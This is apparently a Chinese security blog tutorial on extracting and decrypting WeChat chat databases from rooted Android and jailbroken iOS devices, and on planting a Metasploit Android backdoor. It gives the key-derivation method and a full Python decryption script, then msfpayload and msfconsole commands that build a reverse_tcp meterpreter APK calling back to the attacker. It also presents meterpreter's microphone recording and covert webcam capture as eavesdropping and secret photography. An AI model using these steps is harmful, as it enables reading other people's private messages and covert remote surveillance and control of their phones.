如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓

admin

0×00 条件：

安卓设备已获取root权限，安装SSHDroid(通过ssh、ftp连接手机)

Apple设备越狱，安装OpenSSH插件

0×01 安卓：

很多安卓手机的用户都会遇到这么一个尴尬的问题:手机用久了就不知不觉变得慢了,最后慢到什么都迟钝了。为了解决这个问题和大多数人一样我选择了root设备。

安卓设备在root以后可以对系统文件存在最高级别的操作权限。比如，你在安卓设备上安装了微信，那么root以后通过adb shell你能对微信App的文件配置进行读取修改等操作。   
   

Android应用程序的数据库文件通常会保存在 /data/data/packagename/database 文件夹下，微信App文件存放路径为：/data/data/com.tencent.mm/MicroMsg

[/url]   

首先通过FTP把文件down到本地：

[url=http://image.3001.net/images/20160606/1465200848642.png%21small]   

以34位编码（类似于乱码）命名的文件夹中可找到微信账号的加密数据库文件 ：EnMicroMsg.db

[/url]   

用数据库管理器打开：提示加密或者不是数据库文件

[url=http://image.3001.net/images/20160606/14652008718675.png%21small]   
   

这里可以用windows环境下的sqlite Database Browser浏览器打开：

[/url]   

提示输入密码：

[url=http://image.3001.net/images/20160606/14652008994439.png%21small]

那么，加密数据库使用的密码是什么呢？我们又该如何获取到这个密码？通过上网查资料了解到：微信采用手机的IMEI值和微信UIN值的组合来对数据进行加密。   

微信账号uin：即user information 微信用户信息识别码，获取微信UIN的方式有两种：

1. 1.通过微信app的“system_config_prefs.xml”配置文件获取微信账号uin;
   
2. 
   
3. 2.通过抓取WEB版微信聊天的数据包获取到uin。

复制代码

1.1 App 配置文件

    find / -name “system_config_prefs.xml”

[/url]

1. /data/data/com.tencent.mm/shared_prefs/system_config_prefs.xml

复制代码

1. cat /data/data/com.tencent.mm/shared_prefs/system_config_prefs.xml | grep uin
   

复制代码

[url=http://image.3001.net/images/20160628/14671055233150.png]

1. <int name="default_uin" value="146****21" />
   

复制代码

1.2 谷歌chrome浏览器登陆WEB版微信：

[/url]   

登陆后新建窗口并访问chrome://net-internals/#events

发送信息 抓包 find uin值

[url=http://image.3001.net/images/20160606/14652009417012.png%21small]   

uin:146****21
   

[/url]   

通过上述两种方法找到的uin值是相同的。

安卓拨号界面输入*#06#获得手机IMEI码：354**********85

SIM值+uin值组合即为146****21354**********85   
        

md5:  [url=http://www.spriteking.com/cmd5/]http://www.spriteking.com/cmd5/  左侧加密

[/url]   

得到32位小写md5值：a1edf9f5********************b5e5 取其前七位:a1edf9f输入到sql浏览器中。   

Linux、Mac用户也可以在终端执行：

1. echo -n "146****21354**********85" | md5sum | cut -c -7
   

复制代码

[url=http://image.3001.net/images/20160629/1467165602656.png]

成功打开微信的数据库文件：

[/url]   

[url=http://image.3001.net/images/20160606/1465200984808.png%21small]  

Wechat2txt.py:gist.github.com

1. import os
   
2. import sys
   
3. import re
   
4. import hashlib
   
5. import csv
   
6. import time
   
7. import locale
   
8. import getopt
   
9. 
   
10. 
    
11. 
    
12. 
    
13. def get_db():
    
14.     os.popen('adb root').close()
    
15.     text = os.popen(
    
16.         'adb shell ls /data/data/com.tencent.mm/MicroMsg/*/EnMicroMsg.db').read()
    
17.     return text.splitlines()[- 1] if text else ''
    
18. 
    
19. 
    
20. 
    
21. 
    
22. def get_default_uin():
    
23.     os.popen('adb root').close()
    
24.     text = os.popen(
    
25.         'adb shell cat /data/data/com.tencent.mm/shared_prefs/system_config_prefs.xml').read()
    
26.     default_uin = re.findall(
    
27.         'name="default_uin" value="([0-9]+)"', text)
    
28.     return default_uin[0] if default_uin else 0
    
29. 
    
30. 
    
31. 
    
32. 
    
33. def get_device_ID():
    
34.     text = os.popen('adb shell dumpsys iphonesubinfo').read()
    
35.     device_ID = re.findall('Device ID = ([0-9]+)', text)
    
36.     return device_ID[0] if device_ID else 0
    
37. 
    
38. 
    
39. 
    
40. 
    
41. def get_md5():
    
42.     default_uin = get_default_uin()
    
43.     device_ID = get_device_ID()
    
44.     if default_uin and device_ID:
    
45.         return hashlib.md5(device_ID + default_uin).hexdigest()[0: 7]
    
46.     return ''
    
47. 
    
48. 
    
49. 
    
50. 
    
51. def parse_msgcsv(msgcsv):
    
52.     locale.setlocale(locale.LC_ALL, '')
    
53.     if hasattr(msgcsv, 'title'):
    
54.         msgcsv = [ooOoo0O + '\n' for ooOoo0O in msgcsv.splitlines()]
    
55.         pass
    
56.     OooO0 = csv.reader(msgcsv)
    
57.     OooO0.next()
    
58.     for ooOoo0O in OooO0:
    
59.         try:
    
60.             II11iiii1Ii, OO0o, Ooo, O0o0Oo, Oo00OOOOO, O0O, O00o0OO, name, iIi1ii1I1, o0, I11II1i, IIIII = ooOoo0O[
    
61.                 : 12]
    
62.             pass
    
63.         except:
    
64.             continue
    
65.         ooooooO0oo = 'me' if (Oo00OOOOO == '1') else name
    
66.         IIiiiiiiIi1I1 = time.localtime(int(O00o0OO) / 1000)
    
67.         I1IIIii = time.strftime("%Y-%m-%d %a %H:%M:%S", IIiiiiiiIi1I1)
    
68.         yield [name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0]
    
69.         pass
    
70.     pass
    
71. 
    
72. 
    
73. 
    
74. 
    
75. def get_names(chat):
    
76.     names = {}
    
77.     for name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0 in chat:
    
78.         names[name] = 1
    
79.         pass
    
80.     return names.keys()
    
81. 
    
82. 
    
83. 
    
84. 
    
85. def oo(chat, name=''):
    
86.     text = []
    
87.     name = name.lower()
    
88.     for name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0 in chat:
    
89.         iIi1ii1I1 = iIi1ii1I1.replace('\n', '\n  ')
    
90.         o0 = ('\t' + o0) if o0 else ''
    
91.         if not name:
    
92.             text.append('%s: %s %s: %s %s' %
    
93.                         (name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0))
    
94.             pass
    
95.         elif name.lower() == name:
    
96.             text.append('%s %s: %s %s' %
    
97.                         (I1IIIii, ooooooO0oo, iIi1ii1I1, o0))
    
98.             pass
    
99.         pass
    
100.     return '\n'.join(text) + '\n'
     
101. 
     
102. 
     
103. 
     
104. 
     
105. def IIIii1II1II(dbn, key=''):
     
106.     child_stdin, child_stdout = os.popen2(['sqlcipher', dbn])
     
107.     if key:
     
108.         child_stdin.write('PRAGMA key=%s;\n' % ` key `)
     
109.         child_stdin.write('pragma cipher_use_hmac=off;\n')
     
110.         pass
     
111.     child_stdin.write('.tables\n')
     
112.     child_stdin.close()
     
113.     return child_stdout.read().split()
     
114. 
     
115. 
     
116. 
     
117. 
     
118. def decrypt(dbn, key='', table='message'):
     
119.     table = table or 'message'
     
120.     child_stdin, child_stdout = os.popen2(['sqlcipher', dbn])
     
121.     child_stdin.write('.header on\n')
     
122.     child_stdin.write('.mode csv\n')
     
123.     if key:
     
124.         child_stdin.write('PRAGMA key=%s;\n' % ` key `)
     
125.         child_stdin.write('pragma cipher_use_hmac=off;\n')
     
126.         pass
     
127.     child_stdin.write('select * from %s;\n' % ` table `)
     
128.     child_stdin.close()
     
129.     return child_stdout.read()
     
130. 
     
131. 
     
132. 
     
133. 
     
134. def wechat2txt(names=[]):
     
135.     in_file = 'EnMicroMsg.db'
     
136.     out_file = 'message.csv'
     
137.     db = get_db()
     
138.     md5 = get_md5()
     
139.     os.popen('adb wait-for-device')
     
140.     os.popen('adb pull %s %s' % (db, in_file)).close()
     
141.     msgcsv = decrypt(in_file, md5)
     
142.     if msgcsv.find('\n') < 0:
     
143.         return 1
     
144.     file(out_file, 'w').write(msgcsv)
     
145.     msgs = list(parse_msgcsv(msgcsv))
     
146.     if not msgs:
     
147.         return 1
     
148.     if not names:
     
149.         names = get_names(msgs)
     
150.         pass
     
151.     for name in names:
     
152.         filename = 'message.%s.txt' % name
     
153.         text = oo(msgs, name)
     
154.         if len(text) > 4:
     
155.             file(filename, 'w').write(text)
     
156.             pass
     
157.         pass
     
158.     pass
     
159. 
     
160. 
     
161. help_msg = '''Usage: wechat2txt.py [OPTIONS] [NAME]...
     
162. 
     
163. OPTIONS:
     
164.     -h        display this help and exit
     
165. '''
     
166. 
     
167. 
     
168. 
     
169. 
     
170. def main():
     
171.     try:
     
172.         opts, args = getopt.getopt(sys.argv[1:], 'h')
     
173.     except getopt.error, e:
     
174.         print help_msg
     
175.         return 1
     
176.     for opt, arg in opts:
     
177.         if opt == '-h':
     
178.             print help_msg
     
179.             return 1
     
180.         pass
     
181.     names = args
     
182.     text = wechat2txt(names)
     
183.     return not text
     
184. 
     
185. 
     
186. if __name__ == "__main__":
     
187.     sys.exit(main())

复制代码

0×02 苹果：

Apple设备越狱后可通过Cydia安装各种小插件，通常情况我会安装OpenSSH来使自己能通过终端连接到Apple设备中，并使用sftp传输文件：            

[/url]            

iOS中，应用文件夹以hash值命名，要导出微信、QQ的聊天记录其难度相对安卓来说稍微复杂很多。

在实际操作中我们可以通过巧用Linux命令（find、grep、xargs）来绕过这些坑。         

1. find /var/mobile/Containers/Data -name "MM.sqlite"
   
2. 
   
3. mkdir /cache
   
4. find /var/mobile/Containers/Data -name "MM.sqlite" |xargs -I {} dirname {} | xargs -I {} cp -r  {}/../../ /cache

复制代码

在越狱iOS窃取隐私可参考：[url=http://www.freebuf.com/articles/terminal/76317.html]帮女神修手机的意外发现：隐匿在iOS文件系统中的隐私信息一文            

0×03 在安卓终端植入后门

3.1 实验环境

Kali Linux（Hack）：192.168.31.213

Android（靶机）：192.168.31.118

3.2生成后门文件：

1. cd Desktop
   
2. msfpayload android/meterpreter/reverse_tcp LHOST=192.168.31.213 LPORT=443 R >0xroot.apk

复制代码

[/url]

3.3 运行metasploit控制台

1. msfconsole
   
2. 
   
3. use exploit/multi/handler
   
4. set payload android/meterpreter/reverse_tcp
   
5. set LHOST 192.168.31.213
   
6. set LPORT 443
   
7. run

复制代码

[url=http://image.3001.net/images/20160627/14670188507099.png]

3.4 安装&运行后门App

后门能进行什么操作？我们来看看usage：            

1. meterpreter > help
   
2. 
   
3. Core Commands
   
4. =============
   
5. 
   
6.     Command                   Description
   
7.     -------                   -----------
   
8.     ?                         Help menu
   
9.     background                Backgrounds the current session
   
10.     bgkill                    Kills a background meterpreter script
    
11.     bglist                    Lists running background scripts
    
12.     bgrun                     Executes a meterpreter script as a background thread
    
13.     channel                   Displays information about active channels
    
14.     close                     Closes a channel
    
15.     disable_unicode_encoding  Disables encoding of unicode strings
    
16.     enable_unicode_encoding   Enables encoding of unicode strings
    
17.     exit                      Terminate the meterpreter session
    
18.     help                      Help menu
    
19.     info                      Displays information about a Post module
    
20.     interact                  Interacts with a channel
    
21.     irb                       Drop into irb scripting mode
    
22.     load                      Load one or more meterpreter extensions
    
23.     quit                      Terminate the meterpreter session
    
24.     read                      Reads data from a channel
    
25.     resource                  Run the commands stored in a file
    
26.     run                       Executes a meterpreter script or Post module
    
27.     use                       Deprecated alias for 'load'
    
28.     write                     Writes data to a channel
    
29. 
    
30. 
    
31. Stdapi: File system Commands
    
32. ============================
    
33. 
    
34.     Command       Description
    
35.     -------       -----------
    
36.     cat           Read the contents of a file to the screen
    
37.     cd            Change directory
    
38.     download      Download a file or directory
    
39.     edit          Edit a file
    
40.     getlwd        Print local working directory
    
41.     getwd         Print working directory
    
42.     lcd           Change local working directory
    
43.     lpwd          Print local working directory
    
44.     ls            List files
    
45.     mkdir         Make directory
    
46.     pwd           Print working directory
    
47.     rm            Delete the specified file
    
48.     rmdir         Remove directory
    
49.     search        Search for files
    
50.     upload        Upload a file or directory
    
51. 
    
52. 
    
53. Stdapi: Networking Commands
    
54. ===========================
    
55. 
    
56.     Command       Description
    
57.     -------       -----------
    
58.     ifconfig      Display interfaces
    
59.     ipconfig      Display interfaces
    
60.     portfwd       Forward a local port to a remote service
    
61.     route         View and modify the routing table
    
62. 
    
63. 
    
64. Stdapi: System Commands
    
65. =======================
    
66. 
    
67.     Command       Description
    
68.     -------       -----------
    
69.     execute       Execute a command
    
70.     getuid        Get the user that the server is running as
    
71.     ps            List running processes
    
72.     shell         Drop into a system command shell
    
73.     sysinfo       Gets information about the remote system, such as OS
    
74. 
    
75. 
    
76. Stdapi: Webcam Commands
    
77. =======================
    
78. 
    
79.     Command       Description
    
80.     -------       -----------
    
81.     record_mic    Record audio from the default microphone for X seconds
    
82.     webcam_list   List webcams
    
83.     webcam_snap   Take a snapshot from the specified webcam
    
84. record_mic 通过手机麦克风进行窃听、录音；
    
85. 
    
86. webcam_list 列出安卓设备的所有摄像头；
    
87. 
    
88. webcam_snap 通过摄像头进行偷拍…

复制代码

文中工具下载地址：

SQLite Database Browser：http://pan.baidu.com/s/1nuWlDgd

SSHDroid:http://pan.baidu.com/s/1b6PBK6